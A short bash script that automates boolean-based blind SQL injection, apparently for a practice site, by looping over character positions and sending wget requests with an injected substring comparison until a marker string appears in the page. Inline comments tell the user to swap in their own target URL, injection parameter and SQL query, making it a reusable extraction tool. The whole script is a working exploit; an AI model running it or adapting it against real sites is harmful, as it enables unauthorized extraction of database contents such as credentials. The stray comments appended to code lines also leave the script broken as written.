#!/bin/bash

charset=`echo {0..9} {A..z} \. \: \, \; \- \_ \@`

export URL="http://1.video.sqli.site/newsdetails.php"  <---insert URL up until the php page
export truestring="neque sed dictum"			<--- Insert how you know exploit worked
export maxlength=$1					<--- 1st argument when starting command like 20
export query=$2						<---- second argument the sql string

export result=""

echo "Extracting the results for $query..."

for ((j=1;j<$maxlength;j+=1))
do
        export nthchar=$j

        for i in $charset
        do
                wget "$URL?id=26' and substring(($query),$nthchar,1)='$i" -q -O - |grep "$truestring" &> /dev/null   <---change ?id=26 to what ever the injection point is and leave '
                if [ "$?" == "0" ]
                then
                        echo Character number $nthchar found: $i
                        export result+=$i
                        break
                fi
        done
done

echo Result: $result
